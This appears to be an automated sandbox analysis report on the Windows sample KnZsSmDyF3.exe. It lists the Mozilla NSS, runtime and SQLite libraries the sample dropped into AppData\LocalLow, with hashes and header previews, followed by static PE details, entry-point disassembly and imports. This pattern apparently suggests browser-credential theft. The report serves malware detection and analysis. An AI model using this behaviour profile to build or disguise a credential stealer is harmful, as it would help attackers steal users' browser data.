SHA-256:	06EF2010B738FBE99BCDEBBF162473A4EE090678BB6862EEB0D4C7A8C3F225BB
SHA-512:	9F0DFF00C7E72D7017AECE3FA5C31A9C2C2AA0CCC6606D2561CE8D36A4A1F0AB8DC452E2C65E9F4B6CD32BBB8ADA1FF7C865126A5F318719579DB763E4C4183F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........mR;...;...;.......2.......G.......).......*.......".......4.......>...;...n.......:.......:.......:.......:...Rich;...........................PE..L....=.\.........."!.........................................................`......>.....@.............................l.......<....@..P............(.......P..d...0...T...............................@............................................text............................... ..`.rdata..Z[.......\..................@..@.data........ ......................@....rsrc...P....@......................@..@.reloc..d....P......................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\mozMapi32_InUse.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83408
Entropy (8bit):	6.436278889454398
Encrypted:	false
SSDEEP:	1536:CNr03+TtFKytqB0EeCsu1sW+cdQOTki9jHiU:CNrDKHBBjXQSki9OU
MD5:	385A92719CC3A215007B83947922B9B5
SHA1:	38DE6CA70CEE1BAD84BED29CE7620A15E6ABCD10
SHA-256:	06EF2010B738FBE99BCDEBBF162473A4EE090678BB6862EEB0D4C7A8C3F225BB
SHA-512:	9F0DFF00C7E72D7017AECE3FA5C31A9C2C2AA0CCC6606D2561CE8D36A4A1F0AB8DC452E2C65E9F4B6CD32BBB8ADA1FF7C865126A5F318719579DB763E4C4183F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........mR;...;...;.......2.......G.......).......*.......".......4.......>...;...n.......:.......:.......:.......:...Rich;...........................PE..L....=.\.........."!.........................................................`......>.....@.............................l.......<....@..P............(.......P..d...0...T...............................@............................................text............................... ..`.rdata..Z[.......\..................@..@.data........ ......................@....rsrc...P....@......................@..@.reloc..d....P......................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\mozglue.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	137168
Entropy (8bit):	6.784614237836286
Encrypted:	false
SSDEEP:	3072:Z6s2DIGLXlNJJcPoN0j/kVqhp1qt/TXTv7q1D2JJJvPhrSeXZ5dR:MszGLXlNrE/kVqhp12/TXTjSD2JJJvPt
MD5:	EAE9273F8CDCF9321C6C37C244773139
SHA1:	8378E2A2F3635574C106EEA8419B5EB00B8489B0
SHA-256:	A0C6630D4012AE0311FF40F4F06911BCF1A23F7A4762CE219B8DFFA012D188CC
SHA-512:	06E43E484A89CEA9BA9B9519828D38E7C64B040F44CDAEB321CBDA574E7551B11FEA139CE3538F387A0A39A3D8C4CBA7F4CF03E4A3C98DB85F8121C2212A9097
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;..;..;.....;.W....;...8..;...?..;...:..;...>..;...:...;..:.w.;...?..;...>..;...;..;......;...9..;.Rich.;.........................PE..L...{>.\.........."!.....z...................................................@......j.....@A........................@...t.......,.... ..x....................0..l.......T...................T.......h...@...................l........................text....x.......z.................. ..`.rdata..^e.......f...~..............@..@.data...............................@....didat..8...........................@....rsrc...x.... ......................@..@.reloc..l....0......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\msvcp140.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	440120
Entropy (8bit):	6.652844702578311
Encrypted:	false
SSDEEP:	12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
MD5:	109F0F02FD37C84BFC7508D4227D7ED5
SHA1:	EF7420141BB15AC334D3964082361A460BFDB975
SHA-256:	334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
SHA-512:	46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\nss3.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1245136
Entropy (8bit):	6.766715162066988
Encrypted:	false
SSDEEP:	24576:ido5Js2a56/+VwJebKj5KYFsRjzx5ZxKV6D1Z4Go/LCiytoxq2Zwn5hCM4MSRdY8:Q2aY4w6aozx5ZWMM7yew8MSRK1y
MD5:	02CC7B8EE30056D5912DE54F1BDFC219
SHA1:	A6923DA95705FB81E368AE48F93D28522EF552FB
SHA-256:	1989526553FD1E1E49B0FEA8036822CA062D3D39C4CAB4A37846173D0F1753D5
SHA-512:	0D5DFCF4FB19B27246FA799E339D67CD1B494427783F379267FB2D10D615FFB734711BAB2C515062C078F990A44A36F2D15859B1DACD4143DCC35B5C0CEE0EF5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c.4.'.Z.'.Z.'.Z.....3.Z...[.%.Z.B..#.Z...Y.*.Z..._.-.Z...^.,.Z...[./.Z..[.$.Z.'.[...Z..^.-.Z..Z.&.Z...&.Z..X.&.Z.Rich'.Z.........................PE..L....@.\.........."!.........................................................@......Q.....@................................x=..T.......p........................\|......T...........................h...@............................................text............................... ..`.rdata...Q.......R..................@..@.data...tG...`..."...>..............@....rsrc...p............`..............@..@.reloc...\|.......~...d..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\nssckbi.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	336336
Entropy (8bit):	7.0315399874711995
Encrypted:	false
SSDEEP:	6144:8bndzEL04gF85K9autIMyEhZ/V3psPyHa9tBe1:8bndzEL04pnutIMyAp2z9tBe1
MD5:	BDAF9852F588C86B055C846B53D4C144
SHA1:	03B739430CF9EADE21C977B5B416C4DD94528C3B
SHA-256:	2481DA1C459A2429A933D19AD6AE514BD2AE59818246DDB67B0EF44146CED3D8
SHA-512:	19D9A952A3DF5703542FA52A5A780C2E04D6A132059F30715954EAC40CD1C3F3B119A29736D4A911BE85086AFE08A54A7482FA409DFD882BAC39037F9EECD7EF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pi.Pi.Pi.(..Pi.F2h.Pi.F2j.Pi.F2l.Pi.F2m.Pi.0h.Pi.T3h.Pi.Ph.Pi.T3m.Pi.T3i.Pi.T3..Pi.T3k.Pi.Rich.Pi.........PE..L....@.\.........."!.........`......q........................................@...........@.............................P.......d.......x.......................t)..p...T..............................@............................................text.............................. ..`.rdata..>...........................@..@.data....N.......L..................@....rsrc...x...........................@..@.reloc..t).......*..................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\nssdbm3.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	92624
Entropy (8bit):	6.639527605275762
Encrypted:	false
SSDEEP:	1536:YvNGVOt0VjOJkbH8femxfRVMNKBDuOQWL1421GlkxERC+ANcFZoZ/6tNRCwI41Pc:+NGVOiBZbcGmxXMcBqmzoCUZoZebHPAT
MD5:	94919DEA9C745FBB01653F3FDAE59C23
SHA1:	99181610D8C9255947D7B2134CDB4825BD5A25FF
SHA-256:	BE3987A6CD970FF570A916774EB3D4E1EDCE675E70EDAC1BAF5E2104685610B0
SHA-512:	1A3BB3ECADD76678A65B7CB4EBE3460D0502B4CA96B1399F9E56854141C8463A0CFCFFEDF1DEFFB7470DDFBAC3B608DC10514ECA196D19B70803FBB02188E15E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Z.Y.4.Y.4.Y.4.P...U.4...5.[.4..y.Q.4...7.X.4...1.S.4...0.R.4.{.5.[.4...5.Z.4.Y.5...4...0.A.4...4.X.4....X.4...6.X.4.RichY.4.........................PE..L....@.\.........."!.........0...............0......................................*q....@......................... ?......(@.......`..x............L.......p.......:..T...........................(;..@............0..X............................text............................... ..`.rdata..D....0... ..................@..@.data........P.......>..............@....rsrc...x....`.......@..............@..@.reloc.......p.......D..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\prldap60.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	24016
Entropy (8bit):	6.532540890393685
Encrypted:	false
SSDEEP:	384:TQJMOeAdiNcNUO3qgpw6MnTmJk0llEEHAnDl3vDG8A3OPLondJJs2z:KMaNqb6MTmVllEK2p/DG8MlsQ
MD5:	6099C438F37E949C4C541E61E88098B7
SHA1:	0AD03A6F626385554A885BD742DFE5B59BC944F5
SHA-256:	46B005817868F91CF60BAA052EE96436FC6194CE9A61E93260DF5037CDFA37A5
SHA-512:	97916C72BF75C11754523E2BC14318A1EA310189807AC8059C5F3DC1049321E5A3F82CDDD62944EA6688F046EE02FF10B7DDF8876556D1690729E5029EA414A9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:`wq[.$q[.$q[.$x#.$s[.$.9.%s[.$.9.%p[.$.9.%{[.$.9.%z[.$S;.%s[.$.8.%t[.$q[.$=[.$.8.%t[.$.8.%p[.$.8.$p[.$.8.%p[.$Richq[.$........PE..L....@.\.........."!..... ... .......%.......0...............................p......./....@..........................5......p7..x....P..x............@.......`..$...`1..T............................1..@............0..,............................text...2........ .................. ..`.rdata.......0.......$..............@..@.data...4....@.......4..............@....rsrc...x....P.......8..............@..@.reloc..$....`.......<..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\qipcap.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	16336
Entropy (8bit):	6.437762295038996
Encrypted:	false
SSDEEP:	192:aPgr1ZCb2vGJ7b20qKvFej7x0KDWpH3vUA397Ae+PjPonZwC7Qm:aYpZPGJP209F4vDG8A3OPLonZwC7X
MD5:	F3A355D0B1AB3CC8EFFCC90C8A7B7538
SHA1:	1191F64692A89A04D060279C25E4779C05D8C375
SHA-256:	7A589024CF0EEB59F020F91BE4FE7EE0C90694C92918A467D5277574AC25A5A2
SHA-512:	6A9DB921156828BCE7063E5CDC5EC5886A13BD550BA8ED88C99FA6E7869ECFBA0D0B7953A4932EB8381243CD95E87C98B91C90D4EB2B0ACD7EE87BE114A91A9E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s6.7W..7W..7W..>/..5W...5..5W...5..6W...5..>W...5..<W...7..4W..7W..*W...4..6W...4`.6W...4..6W..Rich7W..................PE..L....B.\.........."!......................... ...............................`.......r....@..................................$..P....@..x............".......P.. .... ..T............................ ..@............ ..h............................text...P........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...x....@......................@..@.reloc.. ....P....... ..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\softokn3.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	144848
Entropy (8bit):	6.54005414297208
Encrypted:	false
SSDEEP:	3072:8Af6suip+I7FEk/oJz69sFaXeu9CoT2nIVFetBW3D2xkEMk:B6POsF4CoT2OeYMzMk
MD5:	4E8DF049F3459FA94AB6AD387F3561AC
SHA1:	06ED392BC29AD9D5FC05EE254C2625FD65925114
SHA-256:	25A4DAE37120426AB060EBB39B7030B3E7C1093CC34B0877F223B6843B651871
SHA-512:	3DD4A86F83465989B2B30C240A7307EDD1B92D5C1D5C57D47EFF287DC9DAA7BACE157017908D82E00BE90F08FF5BADB68019FFC9D881440229DCEA5038F61CD6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....@.\.........."!.........b...............................................P.......\|....@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\ucrtbase.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142072
Entropy (8bit):	6.809041027525523
Encrypted:	false
SSDEEP:	24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
MD5:	D6326267AE77655F312D2287903DB4D3
SHA1:	1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
SHA-256:	0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
SHA-512:	11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E..............o........p..................................................................Rich............................PE..L....3............!.....Z...........=.......p...............................p............@A........................`................................0..8=......$... ...T...........................H...@............................................text....Z.......Z.................. ..`.data........p.......^..............@....idata..6............l..............@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\nW6mI-7yS1k\vcruntime140.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83784
Entropy (8bit):	6.890347360270656
Encrypted:	false
SSDEEP:	1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
MD5:	7587BF9CB4147022CD5681B015183046
SHA1:	F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
SHA-256:	C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
SHA-512:	0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\rQF69AzBla Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6970840431455908
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
MD5:	00681D89EDDB6AD25E6F4BD2E66C61C6
SHA1:	14B2FBFB460816155190377BBC66AB5D2A15F7AB
SHA-256:	8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
SHA-512:	159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\sqlite3.dll Download File
Process:	C:\Users\user\Desktop\KnZsSmDyF3.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	916735
Entropy (8bit):	6.514932604208782
Encrypted:	false
SSDEEP:	24576:BJDwWdxW2SBNTjlY24eJoyGttl3+FZVpsq/2W:BJDvx0BY24eJoyctl3+FTX
MD5:	F964811B68F9F1487C2B41E1AEF576CE
SHA1:	B423959793F14B1416BC3B7051BED58A1034025F
SHA-256:	83BC57DCF282264F2B00C21CE0339EAC20FCB7401F7C5472C0CD0C014844E5F7
SHA-512:	565B1A7291C6FCB63205907FCD9E72FC2E11CA945AFC4468C378EDBA882E2F314C2AC21A7263880FF7D4B84C2A1678024C1AC9971AC1C1DE2BFA4248EC0F98C4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....t\...........!.....Z...................p.....a.......................................... .......................... ......H.... .......................0...3...................................................................................text...XX.......Z..................`.P`.data........p.......`..............@.`..rdata........... ...\|..............@.`@.bss....(.............................`..edata... ......."..................@.0@.idata..H...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc...3...0...4..................@.0B/4...........p......................@.@B/19................................@..B/31.......... ......................@..B/45..........@......................@..B/57..........`......................@.0B/70.....i....p..........

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.506537161767957
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Clipper DOS Executable (2020/12) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	KnZsSmDyF3.exe
File size:	506880
MD5:	aa717550158faf72a3776ce7115f80d3
SHA1:	6d0bbf0b16b7f9e5948c18f488b5428b329821f3
SHA256:	b61998322190573353437177fd9a48263cae5d867055800d86b5fcf006253fdc
SHA512:	8fc1e2fa3655b75a1411aed28f198b9af9ac4dafec366ec35f7fc4dfef27d4286f3d0a1b39b4a8b4ab5b8a0812c6cad3b6091a6e016bb9040e6db3afdaa152ca
SSDEEP:	12288:lI7ZRLRib1HDDNR57wPf7mlLmhwpX9zYWDv+2XBJ:WFib1HNRN0iaSpvDv+2XBJ
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L....7._...

File Icon


Icon Hash:	e0e0e8beb0e4c8ea

Static PE Info

General
Entrypoint:	0x4531d7
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x5FB737F8 [Fri Nov 20 03:28:56 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	9500feeae6f2027f3e5f8d8ceaf88edd

Entrypoint Preview

Instruction
call 00007FD86488D61Fh
jmp 00007FD86488894Dh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 28h
xor eax, eax
push ebx
mov ebx, dword ptr [ebp+0Ch]
push esi
mov esi, dword ptr [ebp+10h]
push edi
mov edi, dword ptr [ebp+08h]
mov byte ptr [ebp-08h], al
mov byte ptr [ebp-07h], al
mov byte ptr [ebp-06h], al
mov byte ptr [ebp-05h], al
mov byte ptr [ebp-04h], al
mov byte ptr [ebp-03h], al
mov byte ptr [ebp-02h], al
mov byte ptr [ebp-01h], al
cmp dword ptr [009C0890h], eax
je 00007FD864888AE0h
push dword ptr [009C244Ch]
call 00007FD86488BB98h
pop ecx
jmp 00007FD864888AD7h
mov eax, 00457DBCh
mov ecx, dword ptr [ebp+14h]
mov edx, 000000A6h
cmp ecx, edx
jg 00007FD864888C4Ah
je 00007FD864888C31h
cmp ecx, 19h
jg 00007FD864888BCEh
je 00007FD864888BBFh
mov edx, ecx
push 00000002h
pop ecx
sub edx, ecx
je 00007FD864888BA3h
dec edx
je 00007FD864888B93h
sub edx, 05h
je 00007FD864888B7Bh
dec edx
je 00007FD864888B5Ch
sub edx, 05h
je 00007FD864888B43h
dec edx
je 00007FD864888B17h
sub edx, 09h
jne 00007FD864888CAAh
mov dword ptr [ebp-28h], 00000003h
mov dword ptr [ebp-24h], 00401870h
fld qword ptr [edi]
lea ecx, dword ptr [ebp-28h]
fstp qword ptr [ebp-20h]
push ecx
fld qword ptr [ebx]
fstp qword ptr [ebp+00h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x61720	0x67	.text
IMAGE_DIRECTORY_ENTRY_IMPORT	0x60a84	0x3c	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5c4000	0x163b8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1270	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2b78	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x224	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x60787	0x60800	False	0.92469083954	data	7.91913577979	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x62000	0x561454	0x4c00	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x5c4000	0x163b8	0x16400	False	0.584148964185	data	5.76577381957	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0x5d41c0	0x130	data
RT_CURSOR	0x5d42f0	0x25a8	dBase III DBT, version number 0, next free block index 40
RT_CURSOR	0x5d68c0	0xea8	dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"
RT_CURSOR	0x5d7768	0x8a8	dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"
RT_CURSOR	0x5d8038	0x130	data
RT_CURSOR	0x5d8168	0xb0	GLS_BINARY_LSB_FIRST
RT_ICON	0x5c4840	0xea8	data	Croatian	Croatia
RT_ICON	0x5c56e8	0x8a8	data	Croatian	Croatia
RT_ICON	0x5c5f90	0x568	GLS_BINARY_LSB_FIRST	Croatian	Croatia
RT_ICON	0x5c64f8	0x25a8	dBase III DBT, version number 0, next free block index 40	Croatian	Croatia
RT_ICON	0x5c8aa0	0x10a8	data	Croatian	Croatia
RT_ICON	0x5c9b48	0x988	data	Croatian	Croatia
RT_ICON	0x5ca4d0	0x468	GLS_BINARY_LSB_FIRST	Croatian	Croatia
RT_ICON	0x5ca9a0	0x6c8	data	Croatian	Croatia
RT_ICON	0x5cb068	0x568	GLS_BINARY_LSB_FIRST	Croatian	Croatia
RT_ICON	0x5cb5d0	0x25a8	data	Croatian	Croatia
RT_ICON	0x5cdb78	0x468	GLS_BINARY_LSB_FIRST	Croatian	Croatia
RT_ICON	0x5ce020	0xea8	data	Croatian	Croatia
RT_ICON	0x5ceec8	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 15053687, next used block 14455349	Croatian	Croatia
RT_ICON	0x5cf770	0x568	GLS_BINARY_LSB_FIRST	Croatian	Croatia
RT_ICON	0x5cfcd8	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 134083022, next used block 133822409	Croatian	Croatia
RT_ICON	0x5d2280	0x10a8	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 145636649, next used block 11745314	Croatian	Croatia
RT_ICON	0x5d3328	0x988	data	Croatian	Croatia
RT_ICON	0x5d3cb0	0x468	GLS_BINARY_LSB_FIRST	Croatian	Croatia
RT_STRING	0x5d8430	0x2e8	data	Croatian	Croatia
RT_STRING	0x5d8718	0x786	data	Croatian	Croatia
RT_STRING	0x5d8ea0	0x6ec	data	Croatian	Croatia
RT_STRING	0x5d9590	0x604	data	Croatian	Croatia
RT_STRING	0x5d9b98	0x300	data	Croatian	Croatia
RT_STRING	0x5d9e98	0x2ca	data	Croatian	Croatia
RT_STRING	0x5da168	0x24a	data	Croatian	Croatia
RT_ACCELERATOR	0x5d4180	0x30	data	Croatian	Croatia
RT_ACCELERATOR	0x5d41b0	0x10	data	Croatian	Croatia
RT_GROUP_CURSOR	0x5d6898	0x22	data
RT_GROUP_CURSOR	0x5d8010	0x22	data
RT_GROUP_CURSOR	0x5d8218	0x22	data
RT_GROUP_ICON	0x5cdfe0	0x3e	data	Croatian	Croatia
RT_GROUP_ICON	0x5ca938	0x68	data	Croatian	Croatia
RT_GROUP_ICON	0x5d4118	0x68	data	Croatian	Croatia
RT_VERSION	0x5d8240	0x1ec	data

Imports

DLL

Import

KERNEL32.dll

GetConsoleAliasesLengthA, GetTapePosition, GetLongPathNameA, GetUserDefaultLangID, AddRefActCtx, GetCPInfoExA, WriteConsoleInputW, ReadConsoleInputW, GetTapeParameters, WaitCommEvent, GetNumaNodeProcessorMask, GetConsoleCP, VerifyVersionInfoA, WaitNamedPipeW, CreateMutexA, WriteConsoleW, GetLastError, CreateFileA, DeleteFileW, WritePrivateProfileSectionA, GetPrivateProfileSectionW, GetLongPathNameW, SetStdHandle, LoadLibraryW, IsDebuggerPresent, FindFirstVolumeW, WriteFile, BuildCommDCBW, FindActCtxSectionStringW, VerLanguageNameW, SetFileShortNameA, WriteProcessMemory, GetFileAttributesW, OpenEventA, SetEvent, IsBadReadPtr, Sleep, WaitForSingleObject, LoadResource, EnumDateFormatsW, FreeConsole, SetConsoleCtrlHandler, SetConsoleTitleW, GetCurrentConsoleFont, SetConsoleTextAttribute, AttachConsole, GetConsoleAliasesLengthW, ReadConsoleA, ReadConsoleOutputW, GetSystemWindowsDirectoryW, GetStringTypeW, BuildCommDCBAndTimeoutsA, HeapUnlock, HeapLock, GetAtomNameW, HeapReAlloc, HeapCompact, GetGeoInfoW, GetCurrentProcess, GetProcAddress, GetModuleHandleA, CreateThread, GetVersionExW, GetACP, WaitForMultipleObjects, VerifyVersionInfoW, WriteConsoleOutputCharacterA, LocalAlloc, SetMailslotInfo, GetCPInfoExW, SetEnvironmentVariableW, SetCalendarInfoA, CommConfigDialogA, GetConsoleWindow, FindAtomW, SetFileApisToOEM, GetStringTypeA, HeapSize, GetDiskFreeSpaceA, GetProfileIntA, InterlockedPopEntrySList, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCommandLineA, GetStartupInfoA, HeapAlloc, EnterCriticalSection, LeaveCriticalSection, TerminateProcess, GetModuleHandleW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, ExitProcess, GetStdHandle, GetModuleFileNameA, SetFilePointer, SetHandleCount, GetFileType, DeleteCriticalSection, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RaiseException, GetCPInfo, GetOEMCP, IsValidCodePage, VirtualAlloc, MultiByteToWideChar, RtlUnwind, LoadLibraryA, InitializeCriticalSectionAndSpinCount, GetConsoleMode, FlushFileBuffers, LCMapStringA, LCMapStringW, GetLocaleInfoA, WriteConsoleA, GetConsoleOutputCP, CloseHandle

GDI32.dll

GetCharWidthFloatA

Exports

Name	Ordinal	Address
@GetSecondVice@0	1	0x45188b
@GetViceVersa@12	2	0x4518b1

Version Infos

Description	Data
InternalName	voygcuadoge.exe
